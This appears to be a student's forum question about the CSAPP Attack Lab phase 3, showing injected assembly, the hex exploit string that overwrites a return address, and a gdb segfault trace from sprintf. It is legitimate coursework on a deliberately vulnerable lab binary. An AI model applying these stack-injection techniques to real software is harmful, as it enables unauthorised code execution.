Segmentation fault of sprintf in CSAPP Attack Lab


I'm currently working on the CSAPP Attack Lab, specifically part 1 phase 3. You can find the complete instructions on page 8 of this PDF: Attack Lab

To begin, I crafted the injection code outlined below:

# Move the address of the string into %rdi
# %rsp starts from 0x5561dc78
# Note that the position of the target string can't be lower than the position storing the address of touch3, otherwise when calling touch3 and hexmatch, the push instruction will overwrite the target string by decreasing rsp

movq $0x5561dc90, %rdi
movq $0x5561dc88, %rsp
ret

Here's the corresponding machine-level code:

48 c7 c7 90 dc 61 55 48
c7 c4 88 dc 61 55 c3 00
fa 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00

However, I encountered a segmentation fault with the following error message:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e57dcd in _IO_str_init_static_internal (sf=sf@entry=0x5561d9c8,
ptr=ptr@entry=0x5561dbfb "", size=size@entry=18446744073709551615,
pstart=pstart@entry=0x5561dbfb "") at strops.c:41
41      in strops.c

It seems to be related to sprintf, but I'm struggling to understand why this occurred. The advice in the writeup mentions:

When functions hexmatch and strncmp are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf. As a result, you will need to be careful about where you place the string representation of your cookie.

I discovered that a valid solution involves storing the target string in the stack of test(). While this workaround works, I'm still eager to understand why I encountered this error.
